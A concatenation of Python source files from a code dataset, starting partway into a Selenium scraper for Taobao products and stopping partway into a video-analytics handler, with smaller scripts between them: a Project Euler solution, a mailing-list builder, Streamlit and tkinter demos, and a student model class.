['enable-automation'])\n chrome = webdriver.Chrome(executable_path=chrome_path, options=options)\n url = 'https://s.taobao.com/'\n chrome.get(url)\n # chrome.maximize_window() # 窗口最大化方便扫码\n ser_input = chrome.find_elements_by_xpath(\"//input[@name='q']\")[0]\n ser_input.send_keys(random_good)\n time.sleep(1)\n ser_btn = chrome.find_elements_by_xpath(\"//button\")[0]\n ser_btn.click()\n return chrome\n\n\n# 解析json数据\ndef json2info(json_):\n json_dic = json.loads(json_)\n try:\n good_items = json_dic['mods']['itemlist']['data']['auctions']\n except:\n print('筛选条件过多,搜索不到该商品!')\n return 1\n\n good_list = []\n for good_item in good_items:\n goods = {\n 'shop': good_item['nick'], # 店铺名\n 'title': good_item['raw_title'], # 宝贝标题\n 'price': good_item['view_price'], # 价格\n 'sales': good_item['view_sales'], # 销量\n 'freight': good_item['view_fee'], # 运费\n 'detail_url': good_item['detail_url'], # 详情页\n 'pic_url': good_item['pic_url']\n }\n good_list.append(goods)\n return good_list\n\n\n# 搜索爬取数据\ndef data_by_search(conn, cursor, etl_date, etl_time, chrome, search_good, crawl_type, pages):\n try:\n tb_input = chrome.find_elements_by_xpath(\"//input[@name='q']\")[0]\n tb_btn = chrome.find_elements_by_xpath(\"//button\")[0]\n tb_input.clear()\n tb_input.send_keys(search_good)\n tb_btn.click()\n time.sleep(random.randint(10, 15))\n # 排序按钮 综合排序/销量/信用/价格从低到高/价格从高到低/总价从低到高/总价从高到��\n sort_btn = chrome.find_elements_by_xpath(\"//li/a[@data-key='sort']\")\n # 销量排序\n if crawl_type == 1: # 下一页不用再按销量排行和搜索\n sort_btn[1].click()\n time.sleep(random.randint(10, 15))\n # 价格100+\n # chrome.find_elements_by_xpath(\"//input[@class='J_SortbarPriceInput input']\")[0].send_keys(100)\n # time.sleep(1)\n # chrome.find_elements_by_xpath(\"//button\")[1].click()\n # time.sleep(random.randint(10, 15))\n except common.exceptions.WebDriverException as e:\n print('--webdriver异常: ', e)\n # playsound(mp3_path)\n tkinter.messagebox.showinfo('tip', 'webdriver异常')\n # print(\"关闭弹窗休息200s\")\n # time.sleep(200)\n tb_input = chrome.find_elements_by_xpath(\"//input[@name='q']\")[0]\n tb_btn = chrome.find_elements_by_xpath(\"//button\")[0]\n tb_input.clear()\n tb_input.send_keys(search_good)\n tb_btn.click()\n time.sleep(random.randint(10, 15))\n sort_btn = chrome.find_elements_by_xpath(\"//li/a[@data-key='sort']\")\n if crawl_type == 1:\n sort_btn[1].click()\n time.sleep(random.randint(10, 15))\n\n # 下拉到底部\n chrome.execute_script('window.scrollTo(0, document.body.scrollHeight)')\n time.sleep(2)\n # 拉取html\n html = chrome.page_source\n json_ = re.findall(r'g_page_config = (.*?)}};', html)[0]\n if json_ == '':\n print('未搜索到: ', search_good)\n return\n json_ = json_ + '}}'\n # 分析json 写入数据库\n print(\"crawl: %s\" % search_good)\n good_list = json2info(json_)\n if good_list==1:\n return\n print('首页size: ', len(good_list))\n info2mysql(good_list, conn, cursor, etl_date, etl_time, search_good)\n # 下一页\n if pages == 1:\n return\n\n for page in range(0, pages - 1):\n # 下一页按钮不可用 返回\n totalPage = chrome.find_elements_by_xpath(\"//div[@class='pager']//ul[@class='items']//li/a[@class='link']/span[@class='icon icon-btn-next-2-disable']\") # 只有一页\n if len(totalPage) > 0:\n return\n try:\n next_btn = chrome.find_element_by_xpath('//li[@class=\"item next\"]//a')\n next_btn.click()\n time.sleep(random.randint(10, 15))\n except common.exceptions.WebDriverException as e:\n print('--webdriver异常: ', e)\n # playsound(mp3_path)\n tkinter.messagebox.showinfo('tip', 'webdriver异常')\n # print(\"关闭弹窗休息200s\")\n # time.sleep(200)\n next_btn = 
chrome.find_element_by_xpath('//li[@class=\"item next\"]//a') # 窗口长度不能缩小变短 加载不了下一页js\n next_btn.click()\n time.sleep(random.randint(10, 15))\n\n # 下拉到底部\n chrome.execute_script('window.scrollTo(0, document.body.scrollHeight)')\n # 拉取html\n html = chrome.page_source\n json_ = re.findall(r'g_page_config = (.*?)}};', html)[0]\n if json_ == '':\n print('翻页未搜索到: ', search_good)\n return\n json_ = json_ + '}}'\n # 分析json\n good_list = json2info(json_)\n print('第',page+2,'页size: ', len(good_list))\n # 写入数据库\n info2mysql(good_list, conn, cursor, etl_date, etl_time, search_good)\n\n\n# 插入数据库1\ndef info2mysql(good_list, conn, cursor, etl_date, etl_time, kw):\n # 一个good_list是一个网页数据 统一设置一个时间\n\n for good in good_list:\n shop = good['shop'] # 店铺名\n title = good['title'] # 宝贝标题\n price = float(good['price']) # 价格\n if '万' in good['sales']:\n sales = float(good['sales'].strip('+万人付款收货')) * 10000 # 销量\n else:\n sales = int(good['sales'].strip('+人付款收货')) # 销量\n if good['freight'] == '': # 运费\n freight = 0\n else:\n freight = float(good['freight'])\n\n detail_url = good['detail_url'] # 详情页\n pic_url = good['pic_url']\n\n # 不录入价格小于100 大于800的数据的数据\n # if price<100 or price>800:\n # continue\n # 这部分商品低价或者高价销量高是有研究价值的\n # sql语句\n del_sql = \"\"\"\n delete from goods where title = %s and etl_date = %s and shop =%s\n \"\"\"\n cursor.execute(del_sql, (title, etl_date, shop))\n conn.commit()\n insert_sql = \"\"\"\n insert into goods(shop,title,price,sales,freight,etl_date,etl_time,kw,detail_url,img_url) VALUES(%s,%s,%s,%s,%s,%s,%s,%s,%s,%s)\n \"\"\"\n # 执行插入数据到数据库操作\n cursor.execute(insert_sql, (shop, title, price, sales, freight, etl_date, etl_time, kw, detail_url, pic_url))\n # 提交,不进行提交无法保存到数据库\n conn.commit()\n\n\n# 写入数据库2\ndef item2mysql(cursor, conn, item, good, etl_date, etl_time):\n insert_sql = \"\"\"\n insert into goods_shop(shop,price,title,sales,detail_url,img_url,kw,etl_date,etl_time) values (%s,%s,%s,%s,%s,%s,%s,%s,%s)\n \"\"\"\n cursor.execute(insert_sql, (\n item['shop'], item['price'], item['title'], item['sales'], item['detail_url'], item['pic_url'], good, etl_date,\n etl_time))\n conn.commit()\n\n\n# 爬取店铺所有\ndef all2mysql(cursor, conn, item, etl_date, etl_time):\n insert_sql = \"\"\"\n insert into goods_shop(shop,price,title,sales,detail_url,img_url,etl_date,etl_time) values (%s,%s,%s,%s,%s,%s,%s,%s)\n \"\"\"\n cursor.execute(insert_sql, (\n item['shop'], item['price'], item['title'], item['sales'], item['detail_url'], item['pic_url'], etl_date,\n etl_time))\n conn.commit()\n\n\ndef login(chrome):\n if chrome.current_url.startswith('https://login'):\n # tkinter.messagebox.showerror('提示', '请登录')\n print('未登录...')\n time.sleep(10)\n login(chrome)\n\n\n# 查询店铺\ndef sel_shops(cursor):\n # 数据库查询店铺及地址\n sel_sql = \"\"\"\n select * from shop where enable = 1\n \"\"\"\n cursor.execute(sel_sql)\n shop_list = cursor.fetchall()\n return shop_list\n\n\n# 根据店铺查询指定宝贝\ndef data_by_shop(chrome, good, shop):\n try:\n shop_input = chrome.find_elements_by_xpath(\"//input[@name='q']\")[0]\n shop_btn = chrome.find_elements_by_xpath(\"//button[2]\")[0]\n shop_input.send_keys(good)\n shop_btn.click()\n except common.exceptions.WebDriverException as e:\n print('--webdriver异常: ', e)\n tkinter.messagebox.showinfo('tip', 'webdriver异常')\n # 手动关闭滑块\n shop_input = chrome.find_elements_by_xpath(\"//input[@name='q']\")[0]\n shop_btn = chrome.find_elements_by_xpath(\"//button[2]\")[0]\n shop_input.send_keys(good)\n shop_btn.click()\n try:\n item = {\n 'shop': shop[1],\n 'price':\n 
chrome.find_elements_by_xpath(\"//div[@class='shop-hesper-bd grid']//div[@class='cprice-area']/span\")[\n 0].text,\n 'title':\n chrome.find_elements_by_xpath(\"//div[@class='shop-hesper-bd grid']//a[@class='item-name J_TGoldData']\")[\n 0].text,\n 'sales': chrome.find_elements_by_xpath(\"//div[@class='shop-hesper-bd grid']//div[@class='sale-area']/span\")[\n 0].text,\n 'detail_url':\n chrome.find_elements_by_xpath(\"//div[@class='shop-hesper-bd grid']//a[@class='item-name J_TGoldData']\")[\n 0].get_attribute('href'),\n 'pic_url': chrome.find_elements_by_xpath(\"//div[@class='shop-hesper-bd grid']//dt[@class='photo']//img\")[\n 0].get_attribute('src')\n }\n print(' %s' % good)\n except:\n print('未获取到: %s' % good)\n item = {\n 'shop': shop[1],\n 'price': 0,\n 'title': '无此商品',\n 'sales': 0,\n 'detail_url': 'null',\n 'pic_url': 'null'\n }\n return item\n\n\ndef read_goods_by_excel():\n # 读取excel中的数据\n # 第一步:打开工作簿\n wb = openpyxl.load_workbook('D:\\workSpaceXD\\MyTarget\\goods.xlsx')\n # 第二步:选取表单\n sh = wb['Sheet1']\n # 第三步:读取数据\n # 参数 row:行 column:列\n ce = sh.cell(row=1, column=1) # 读取第一行,第一列的数据\n # print(ce.value)\n # 按行读取数据 list(sh.rows)\n # print(list(sh.rows)[1:])\n # 按行读取数据,去掉第一行的表头信息数据\n switch_list = []\n ps4_list = []\n search_goods = []\n for cases in list(sh.rows)[1:]:\n if cases[0].value is not None:\n case_switch = 'switch ' + cases[0].value\n switch_list.append(case_switch)\n search_goods.append(case_switch)\n\n if cases[2].value is not None:\n case_ps4 = 'ps4 ' + cases[2].value\n ps4_list.append(case_ps4)\n search_goods.append(case_ps4)\n\n # 关闭工作薄\n wb.close()\n return search_goods\n\n\n# 爬取店铺所有商品\ndef crawl_all_f_shop(chrome, shop, cursor, conn, etl_date, etl_time):\n totalPage = chrome.find_elements_by_xpath(\"//span[@class='page-info']\")\n if len(totalPage) == 0:\n time.sleep(10)\n return\n total = totalPage[0].text\n total = int(total.split('/')[1])\n error_str = []\n for page in range(1, total + 1):\n try:\n dl_list = chrome.find_elements_by_xpath(\"//dl//img\") # 多少张图就有多少宝贝 dl与宝贝数不一致\n if len(dl_list) == 0:\n print('网速较慢', 'slow--' * 10)\n chrome.refresh()\n time.sleep(random.randint(10, 15))\n dl_list = chrome.find_elements_by_xpath(\"//dl//img\")\n except common.exceptions.WebDriverException as e:\n print('--webdriver异常: ', e)\n # playsound(mp3_path)\n tkinter.messagebox.showinfo('tip', 'webdriver异常')\n print(\"关闭弹窗休息200s\")\n time.sleep(200)\n dl_list = chrome.find_elements_by_xpath(\"//dl//img\")\n # 手动关闭滑块\n # ------------------------------------------------------------------------\n price_list = chrome.find_elements_by_xpath(\"//dl//span[@class='c-price']\")\n title_list = chrome.find_elements_by_xpath(\"//dl//img\")\n sales_list = chrome.find_elements_by_xpath(\"//dl//span[@class='sale-num']\")\n detail_url = chrome.find_elements_by_xpath(\"//dl//a[@class='item-name J_TGoldData']\")\n\n for i in range(0, len(dl_list) - 1):\n title = title_list[i].get_attribute('alt')\n ret = re.sub(r'', '', title)\n ret2 = re.sub(r'', '', ret)\n if len(sales_list) == 0:\n good = {\n 'shop': shop[1],\n 'price': price_list[i].text,\n 'title': ret2,\n 'sales': 99999,\n 'detail_url': detail_url[i].get_attribute('href'),\n 'pic_url': title_list[i].get_attribute('src')\n }\n else:\n good = {\n 'shop': shop[1],\n 'price': price_list[i].text,\n 'title': ret2,\n 'sales': sales_list[i].text,\n 'detail_url': detail_url[i].get_attribute('href'),\n 'pic_url': title_list[i].get_attribute('src')\n }\n print(good)\n all2mysql(cursor, conn, good, etl_date, etl_time)\n print('--------爬取第%s' % page, 
 print('--------爬取第%s' % page, '页结束---------')\n time.sleep(random.randint(10, 15))\n if page != total:\n try:\n next_btn = chrome.find_elements_by_xpath(\"//a[@class='J_SearchAsync next']\")[0]\n next_btn.click()\n except common.exceptions.WebDriverException as e:\n print('--webdriver异常: ', e)\n # playsound(mp3_path)\n tkinter.messagebox.showinfo('tip', 'webdriver异常') # 手动滑块\n print(\"关闭弹窗休息200s\")\n time.sleep(200)\n next_btn = chrome.find_elements_by_xpath(\"//a[@class='J_SearchAsync next']\")[0]\n next_btn.click()\n time.sleep(5)\n return error_str\n\n\ndef delete_data(cursor, etl_date, shop):\n sel_sql = \"\"\"\n delete from goods_shop where etl_date = %s and shop = %s\n \"\"\"\n cursor.execute(sel_sql, (etl_date, shop[1]))\n\n\ndef updateShop(cursor, conn, shop):\n sql = \"\"\"\n update shop set enable = 0 where name = %s\n \"\"\"\n cursor.execute(sql, shop[1])\n conn.commit()\n\n\ndef UpdateAllShop(cursor, conn):\n sql = \"\"\"\n update shop set enable = 1 \n \"\"\"\n cursor.execute(sql)\n conn.commit()\n\n\ndef read_goods_by_sql(conn, cursor):\n sel_sql = \"\"\"\n select name from tb_search where enabled =1\n \"\"\"\n cursor.execute(sel_sql)\n shop_list = cursor.fetchall()\n return shop_list\n\n\ndef enabled_goods(conn, cursor, shopName):\n update_eql = \"\"\"\n update tb_search set enabled = 0 where name = %s\n \"\"\"\n cursor.execute(update_eql, shopName)\n conn.commit()\n\n\ndef enabled_goods_one(conn, cursor):\n update_eql = \"\"\"\n update tb_search set enabled = 1 \n \"\"\"\n cursor.execute(update_eql)\n conn.commit()\n\n\ndef main():\n # 连接mysql(pymysql 1.0 起不再支持位置参数, 改用关键字参数更稳妥)\n conn = pymysql.connect(host='localhost', user='root', password='root', database='vhr')\n # 创建游标\n cursor = conn.cursor()\n search_goods = read_goods_by_sql(conn, cursor)\n # search_goods = [\"香蕉\", \"苹果\", \"梨\", \"葡萄\"]\n # print('爬取列表: ', search_goods)\n random_good = random.randint(0, len(search_goods) - 1)\n chrome = start(search_goods[random_good])\n # 15s手动扫码\n time.sleep(15)\n login(chrome)\n print('登录成功:', chrome.current_url)\n\n # 数据日期\n etl_date = time.strftime(\"%Y%m%d\", time.localtime())\n etl_time = time.strftime(\"%H:%M:%S\", time.localtime())\n print('----- 销量排行 -----')\n count = 0\n for search_good in search_goods:\n pages = 3\n if count > 40: # 后续宝贝热度低\n pages = 2\n data_by_search(conn, cursor, etl_date, etl_time, chrome, search_good, 1, pages)\n count += 1\n enabled_goods(conn, cursor, search_good)\n enabled_goods_one(conn, cursor)\n\n # 爬取数据--代表店铺\n # print('------------- 代表店铺 -------------------')\n # shop_list = sel_shops(cursor)\n # print(\"猎杀名单:\")\n # for s in shop_list:\n # print(s[1])\n # for shop in shop_list:\n # delete_data(cursor, etl_date,shop)\n # switch_url = shop[2]\n # ps4_url = shop[3]\n # chrome.get(switch_url)\n # time.sleep(10)\n # print('########店铺:', shop[1], ' ###### switch #########')\n # # 爬取switch商品\n # crawl_all_f_shop(chrome, shop, cursor, conn, etl_date, etl_time)\n # \n # if ps4_url is not None:\n # chrome.get(ps4_url)\n # time.sleep(10)\n # print('########店铺:', shop[1], ' ###### ps4 #########')\n # # 爬取ps4商品\n # crawl_all_f_shop(chrome, shop, cursor, conn, etl_date, etl_time)\n # # 该店铺爬取完 enable设置为 0 当天不用重复爬取了\n # updateShop(cursor, conn, shop)\n # print(shop[1], \"--猎杀完毕--休息下\")\n # time.sleep(random.randint(90, 150))\n # # 全部爬取完 enable设置为 1\n # UpdateAllShop(cursor, conn)\n chrome.close()\n # 关闭游标和连接\n cursor.close()\n conn.close()\n\n\nif __name__ == '__main__':\n scheduler = sched.scheduler(time.time, time.sleep)\n # 增加调度任务 初始\n scheduler.enter(1, 1, main)\n # 增加调度任务 240-360分钟\n # scheduler.enter(random.randint(240,360)*60, 1, main)\n # scheduler.enter(random.randint(240,360)*60, 1, main)\n # scheduler.enter(random.randint(240,360)*60, 1, main)\n\n # 所有调度任务 暂定一天调度4次\n # 隐藏tk主窗口\n tkinter.Tk().withdraw()\n\n # tkinter.messagebox.showinfo('tip', '即将开始爬取数据')\n # 运行全部调度任务(scheduler.run 会依次执行队列中的全部任务, 无需再遍历 queue)\n scheduler.run()\n\n print('-' * 30)\n print('爬取结束')\n","sub_path":"workspace/pycharmproject/wayne_python/projects/taobao_selenium/half_auto_taobao.py","file_name":"half_auto_taobao.py","file_ext":"py","file_size_in_byte":18899,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"648740198","text":"''' Euler 3\nThe prime factors of 13195 are 5, 7, 13 and 29.\n\nWhat is the largest prime factor of the number 600851475143 ?\n'''\n\n# Trial division: each factor is divided out of n as soon as it is found, so\n# only primes ever divide n here; once factor * factor > n, the remaining n is\n# itself the largest prime factor. This replaces the earlier numpy attempt\n# that failed for small inputs such as 24.\n\ndef largest_prime_factor(n):\n factor = 2\n while factor * factor <= n:\n if n % factor == 0:\n n //= factor\n else:\n factor += 1\n return n\n\n
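# Quick sanity checks (illustrative additions): largest_prime_factor(13195) == 29\n# matches the docstring, and largest_prime_factor(24) == 3 covers the small case\n# the original version could not handle.\n\n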
n = 600851475143\n\n# 6857\nprint(largest_prime_factor(n))\n","sub_path":"Euler/Euler_3.py","file_name":"Euler_3.py","file_ext":"py","file_size_in_byte":794,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"422312599","text":"from urllib.request import urlopen\nimport json\n\nresponse = urlopen(\"https://sheetsu.com/apis/v1.0/d50491ba55ba\")\nstr_response = response.read().decode('utf-8')\nmembers = json.loads(str_response)\n\nimport argparse\nimport subprocess\nimport time\n\nmailingLists = [\n \"pepoff\",\n \"drumline\",\n \"sectionleaders\",\n \"pepfun\",\n \"pep-band\",\n \"highwoodwinds\",\n \"middlewinds\",\n \"lowbrass\",\n \"trumpets\",\n \"colorguard\",\n \"marching\",\n \"clarinets\",\n \"flutes\",\n \"stands\",\n \"pit\",\n \"pep-seniors\",\n \"pep-juniors\",\n \"pep-sophomores\",\n \"pep-freshmen\",\n \"drummajors\",\n \"highwoodwinds-marching\",\n \"middlewinds-marching\",\n \"lowbrass-marching\",\n \"trumpets-marching\",\n \"clarinets-marching\",\n \"flutes-marching\",\n \"drumline-marching\",\n \"pit-marching\",\n # \"stands\" was listed twice; the duplicate entry was removed\n \"winterguard\"]\n\nprint(\"UPDATING MAILING LISTS\")\nsubprocess.call([\"rm\", \"-f\", \"-r\", \"newMailingLists\"])\nsubprocess.call([\"mkdir\", \"newMailingLists\"])\n\npepFunOut = open('newMailingLists/pepfun', 'w')\nmarchingOut = open('newMailingLists/marching', 'w')\nstandsOut = open('newMailingLists/stands', 'w')\nsectionLeaderOut = open('newMailingLists/sectionleaders', 'w')\nofficerOut = open('newMailingLists/pepoff', 'w')\ncolorguardOut = open('newMailingLists/colorguard', 'w')\npepBandOut = open('newMailingLists/pep-band', 'w')\nclarinetsOut = open('newMailingLists/clarinets', 'w')\nhighwoodwindsOut = open('newMailingLists/highwoodwinds', 'w')\nflutesOut = open('newMailingLists/flutes', 'w')\ntrumpetsOut = open('newMailingLists/trumpets', 'w')\nmiddlewindsOut = open('newMailingLists/middlewinds', 'w')\nlowbrassOut = open('newMailingLists/lowbrass', 'w')\ndrumlineOut = open('newMailingLists/drumline', 'w')\npitOut = open('newMailingLists/pit', 'w')\npepSeniors = open('newMailingLists/pep-seniors', 'w')\npepJuniors = open('newMailingLists/pep-juniors', 'w')\npepSophomores = 
open('newMailingLists/pep-sophomores', 'w')\npepFreshmen = open('newMailingLists/pep-freshmen', 'w')\ndrummajorsOut = open('newMailingLists/drummajors', 'w')\nhighwoodwinds_marching = open('newMailingLists/highwoodwinds-marching', 'w')\nmiddlewinds_marching = open('newMailingLists/middlewinds-marching', 'w')\nlowbrass_marching = open('newMailingLists/lowbrass-marching', 'w')\ntrumpets_marching = open('newMailingLists/trumpets-marching', 'w')\nclarinets_marching = open('newMailingLists/clarinets-marching', 'w')\nflutes_marching = open('newMailingLists/flutes-marching', 'w')\ndrumline_marching = open('newMailingLists/drumline-marching', 'w')\npit_marching = open('newMailingLists/pit-marching', 'w')\nstands_only = open('newMailingLists/stands', 'w')\nwinterGuard = open('newMailingLists/winterguard', 'w')\n\n\ndef toEmail(name, email):\n return name + ' <' + email + '>\\n';\n\n\ndef assignStands(name, email, stands):\n if stands == \"clarinets\":\n clarinetsOut.write(toEmail(name, email));\n highwoodwindsOut.write(toEmail(name, email));\n if stands == \"flutes\":\n flutesOut.write(toEmail(name, email));\n highwoodwindsOut.write(toEmail(name, email));\n if stands == \"trumpets\":\n trumpetsOut.write(toEmail(name, email));\n if stands == \"middlewinds\":\n middlewindsOut.write(toEmail(name, email));\n if stands == \"lowbrass\":\n lowbrassOut.write(toEmail(name, email));\n if stands == \"drumline\":\n drumlineOut.write(toEmail(name, email));\n if stands == \"pit\":\n pitOut.write(toEmail(name, email));\n if stands == \"colorguard\":\n colorguardOut.write(toEmail(name, email));\n if stands == \"drummajors\":\n drummajorsOut.write(toEmail(name, email));\n\n\ndef assignMarching(name, email, marching):\n marchingOut.write(toEmail(name, email));\n if marching == \"clarinets\":\n clarinets_marching.write(toEmail(name, email));\n highwoodwinds_marching.write(toEmail(name, email));\n if marching == \"flutes\":\n flutes_marching.write(toEmail(name, email));\n highwoodwinds_marching.write(toEmail(name, email));\n if marching == \"trumpets\":\n trumpets_marching.write(toEmail(name, email));\n if marching == \"middlewinds\":\n middlewinds_marching.write(toEmail(name, email));\n if marching == \"lowbrass\":\n lowbrass_marching.write(toEmail(name, email));\n if marching == \"drumline\":\n drumline_marching.write(toEmail(name, email));\n if marching == \"pit\":\n pit_marching.write(toEmail(name, email));\n if marching == \"colorguard\":\n colorguardOut.write(toEmail(name, email));\n\nfor i in members:\n name = i['Name']\n if name == \"name\":\n continue\n email = i['Email']\n isPepFun = i['pepfun']\n marching = i['marching']\n isOnlyStands = i['stands only']\n standsSection = i['stands section']\n isSectionLeader = i['sectionleaders']\n isOfficer = i['pepoff']\n isPepBand = i['pep-band']\n isSenior = i['seniors']\n isJunior = i['juniors']\n isSophomore = i['sophomores']\n isFreshmen = i['freshmen']\n isWinterGuard = i['winterguard']\n if isPepFun == \"x\":\n pepFunOut.write(toEmail(name, email))\n if isOnlyStands == \"x\":\n stands_only.write(toEmail(name, email))\n if isSectionLeader == \"x\":\n sectionLeaderOut.write(toEmail(name, email))\n if isOfficer == \"x\":\n officerOut.write(toEmail(name, email))\n if isPepBand == \"x\":\n pepBandOut.write(toEmail(name, email))\n if marching != \"\":\n assignMarching(name, email, marching)\n assignStands(name, email, standsSection)\n if isSenior == \"x\":\n pepSeniors.write(toEmail(name, email));\n if isJunior == \"x\":\n pepJuniors.write(toEmail(name, email));\n if 
isSophomore == \"x\":\n pepSophomores.write(toEmail(name, email))\n if isFreshmen == \"x\":\n pepFreshmen.write(toEmail(name, email))\n if isWinterGuard == \"x\":\n winterGuard.write(toEmail(name, email))\n\npepFunOut.close()\nmarchingOut.close()\nstandsOut.close()\nsectionLeaderOut.close()\nofficerOut.close()\npepBandOut.close()\nclarinetsOut.close()\nhighwoodwindsOut.close()\nflutesOut.close()\ntrumpetsOut.close()\nmiddlewindsOut.close()\nlowbrassOut.close()\ndrumlineOut.close()\npitOut.close()\ncolorguardOut.close()\ndrummajorsOut.close();\npepSeniors.close();\npepJuniors.close();\npepSophomores.close();\npepFreshmen.close();\nhighwoodwinds_marching.close();\nmiddlewinds_marching.close();\nlowbrass_marching.close();\ntrumpets_marching.close();\nclarinets_marching.close()\nflutes_marching.close()\npit_marching.close()\ndrumline_marching.close()\nstands_only.close();\nwinterGuard.close();\n\n\nfor list in mailingLists:\n subprocess.call([\"scp\", \"newMailingLists/\"+list, \"dkaravoussianis@ccc.wpi.edu:/shared/aliases/\"+list])\n","sub_path":"updateAliases.py","file_name":"updateAliases.py","file_ext":"py","file_size_in_byte":6650,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"95078780","text":"\"\"\"\r\n 學生模型類\r\n 管理每個學生的資訊\r\n\"\"\"\r\n\r\nclass StudentModel:\r\n def __init__(self,name=\"\",age=0,score=0,id=0):\r\n \"\"\"\r\n 學生基本資訊\r\n :param name: 姓名\r\n :param id: 學號\r\n :param age: 年齡\r\n :param score: 成績\r\n \"\"\"\r\n self.id = id\r\n self.name = name\r\n self.age = age\r\n self.score = score","sub_path":"student_manager_system/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":409,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"140110846","text":"import tkinter as tk\nclass App:\n def __init__(self,master):\n frame=tk.Frame(master)\n frame.pack(side='left')\n self.h1_there=tk.Button(frame,text='打招呼',bg='black',fg='white',command=self.say_hi)\n self.h1_there.pack(padx=10,pady=5)\n def say_hi(self):\n print('大家好!')\nroot=tk.Tk()\napp=App(root)\nroot.mainloop()\n\n \n\n\n\n\n","sub_path":"tkinter1.py","file_name":"tkinter1.py","file_ext":"py","file_size_in_byte":372,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"515269549","text":"import streamlit as st\n# To make things easier later, we're also importing numpy and pandas for\n# working with sample data.\nimport numpy as np\nimport pandas as pd\nfrom matplotlib import pyplot as plt\n\n\ndef app():\n client_list = pd.read_csv(\"client_list_raw.csv\", index_col=\"SK_ID_CURR\")\n\n all_features = client_list.columns.tolist()\n\n st.markdown('# Compare clients')\n\n client_list_id = st.multiselect(\n 'Select client IDs',\n client_list.index)\n 'You selected:', client_list_id\n\n st.write(client_list[client_list.index.isin(client_list_id)])\n\n st.markdown('# Focus on specific features')\n\n features_selected = st.multiselect(\n 'Filter on specific features',\n all_features, default=[\"% default\"])\n\n 'You selected:', features_selected\n\n st.write(client_list[features_selected][client_list.index.isin(client_list_id)])\n\n st.markdown('# Compare with the rest of the clients')\n\n analyze_feature = st.selectbox(\n 'Check the distribution of a feature',\n features_selected)\n st.write('You selected:', analyze_feature)\n\n # analyze feature distribution\n if analyze_feature:\n if client_list[analyze_feature].dtype == 'O':\n bar_chart_data = 
client_list.reset_index().groupby([analyze_feature], as_index=False) \\\n .SK_ID_CURR.count() \\\n .rename(columns={\"SK_ID_CURR\": \"Clients number\"}) \\\n .set_index(analyze_feature)\n st.bar_chart(bar_chart_data)\n\n else:\n fig, ax = plt.subplots()\n ax.hist(client_list[analyze_feature], bins=50)\n plt.title(analyze_feature)\n plt.style.use('seaborn-dark-palette')\n st.pyplot(fig)\n\n","sub_path":"explorer.py","file_name":"explorer.py","file_ext":"py","file_size_in_byte":1720,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"88490214","text":"from __future__ import print_function, division, unicode_literals, absolute_import\nimport cv2\nimport contextlib\nimport json\nimport logging\nimport numpy as np\nimport os\nimport select\nimport sys\nimport threading\nimport time\nimport traceback\n\nfrom concurrent import futures\nfrom kafka import KafkaProducer\nfrom flask import Flask, jsonify, request, Response\nfrom ace import analytic_pb2, analytic_pb2_grpc\nfrom ace.rtsp import RTSPHandler\nimport grpc\nfrom ace.aceclient import AceDB\n\nfrom google.protobuf import json_format\n\n\nlogger = logging.getLogger(__name__)\n\n\nclass EndpointAction(object):\n\n def __init__(self, action):\n self.action = action\n\n def __call__(self, *args):\n answer = self.action()\n return answer\n\n\nclass AnalyticHandler:\n def __init__(self, frame_obj=None, input_type=\"frame\", stream_addr=\"\", session_id=\"\"):\n\n self.input_frame = analytic_pb2.InputFrame()\n self.analytic = analytic_pb2.AnalyticData()\n self.resp = analytic_pb2.ProcessedFrame()\n self.resp.data.stream_addr = stream_addr\n self.resp.session_id = session_id\n # initialize both frame holders so get_frame() works on either construction path\n self.frame = None\n self.jpeg = None\n if not frame_obj:\n return\n\n self.frame = frame_obj[2]\n self.input_frame.frame_num = frame_obj[1]\n self.input_frame.timestamp = frame_obj[0]\n\n def from_request(self, req):\n self.input_frame.MergeFrom(req.frame)\n self.analytic.MergeFrom(req.analytic)\n self.jpeg = self.input_frame.frame.img\n # np.fromstring is deprecated for binary data; frombuffer is the replacement\n self.frame = cv2.imdecode(np.frombuffer(self.jpeg, dtype=np.uint8), 1)\n\n def get_frame(self, format=None):\n if format == \"JPEG\":\n logger.info(\"Getting image as jpeg\")\n if not self.jpeg:\n self.jpeg = cv2.imencode(\".jpeg\", self.frame, [int(cv2.IMWRITE_JPEG_QUALITY), 100])[\n 1].tobytes()\n return self.jpeg\n return self.frame\n\n def add_bounding_box(self, classification, confidence, x1, y1, x2, y2, supplement=None):\n \"\"\"Add bounding box for classification to the response\"\"\"\n if self.frame is not None:\n x1 = max(min(x1, self.frame.shape[1]-2), 2)\n x2 = max(min(x2, self.frame.shape[1]-2), 2)\n y1 = max(min(y1, self.frame.shape[0]-2), 2)\n y2 = max(min(y2, self.frame.shape[0]-2), 2)\n box = analytic_pb2.RegionOfInterest(\n box=analytic_pb2.BoundingBox(corner1=analytic_pb2.Point(\n x=x1, y=y1), corner2=analytic_pb2.Point(x=x2, y=y2)),\n classification=classification, confidence=confidence, supplement=supplement)\n self.resp.data.roi.extend([box])\n\n def frame_number(self):\n return self.input_frame.frame_num\n\n def timestamp(self):\n return self.input_frame.timestamp\n\n def get_response(self):\n self.resp.analytic.MergeFrom(self.analytic)\n self.add_frame_info()\n return self.resp\n\n def get_analytic_metadata(self):\n return self.analytic\n\n
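 # NOTE: add_frame_info re-encodes the frame below solely to report its\n # JPEG-encoded byte size; the encoded buffer itself is discarded.\n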
